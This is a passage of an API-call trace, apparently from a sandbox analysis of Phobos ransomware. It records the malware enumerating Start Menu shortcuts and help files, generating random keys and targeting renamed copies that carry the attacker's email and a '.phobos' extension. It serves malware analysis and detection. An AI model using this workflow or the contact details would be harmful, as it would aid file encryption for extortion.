"c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.248] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2935) returned 1 [0123.248] CloseHandle (hObject=0x2b8) returned 1 [0123.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk")) returned 0x20 [0123.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.248] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.248] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.248] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.248] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=3041) returned 1 [0123.248] CloseHandle (hObject=0x2b8) returned 1 [0123.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk")) returned 0x20 [0123.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.249] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.249] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.249] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.249] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=3055) returned 1 [0123.249] CloseHandle (hObject=0x2b8) returned 1 [0123.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk")) returned 0x20 [0123.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.250] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.250] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.250] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.251] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2767) returned 1 [0123.251] CloseHandle (hObject=0x2b8) returned 1 [0123.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk")) returned 0x20 [0123.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.251] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.252] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.252] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=3021) returned 1 [0123.252] CloseHandle (hObject=0x2b8) returned 1 [0123.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk")) returned 0x20 [0123.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.252] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\mozilla firefox.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.253] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1169) returned 1 [0123.253] CloseHandle (hObject=0x2b8) returned 1 [0123.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\mozilla firefox.lnk")) returned 0x20 [0123.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\mozilla firefox.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.253] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.254] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.254] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.255] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=3055) returned 1 [0123.255] CloseHandle (hObject=0x2b8) returned 1 [0123.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk")) returned 0x20 [0123.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.255] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.255] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.255] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sidebar.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.255] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1330) returned 1 [0123.255] CloseHandle (hObject=0x2b8) returned 1 [0123.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sidebar.lnk")) returned 0x20 [0123.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sidebar.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.256] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sidebar.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.256] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.256] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows anytime upgrade.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.256] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1352) returned 1 [0123.256] CloseHandle (hObject=0x2b8) returned 1 [0123.256] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows anytime upgrade.lnk")) returned 0x20 [0123.256] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows anytime upgrade.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.256] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows anytime upgrade.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.256] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.257] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows dvd maker.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.257] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1326) returned 1 [0123.257] CloseHandle (hObject=0x2b8) returned 1 [0123.257] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows dvd maker.lnk")) returned 0x20 [0123.257] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows dvd maker.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.257] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows dvd maker.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.257] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.257] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows fax and scan.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.257] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1210) returned 1 [0123.258] CloseHandle (hObject=0x2b8) returned 1 [0123.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows fax and scan.lnk")) returned 0x20 [0123.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows fax and scan.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows fax and scan.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.258] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows media player.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.258] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1547) returned 1 [0123.258] CloseHandle (hObject=0x2b8) returned 1 [0123.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows media player.lnk")) returned 0x20 [0123.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows media player.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.259] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\xps viewer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.259] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1246) returned 1 [0123.259] CloseHandle (hObject=0x2b8) returned 1 [0123.259] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\xps viewer.lnk")) returned 0x20 [0123.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\xps viewer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\xps viewer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.260] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.260] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1266) returned 1 [0123.261] CloseHandle (hObject=0x2b8) returned 1 [0123.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk")) returned 0x20 [0123.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.261] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.261] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.261] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.262] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=390) returned 1 [0123.262] CloseHandle (hObject=0x2b8) returned 1 [0123.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn")) returned 0x2022 [0123.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\hx.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.262] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.262] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.262] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.263] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=326) returned 1 [0123.264] CloseHandle (hObject=0x2b8) returned 1 [0123.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn")) returned 0x2022 [0123.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.264] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 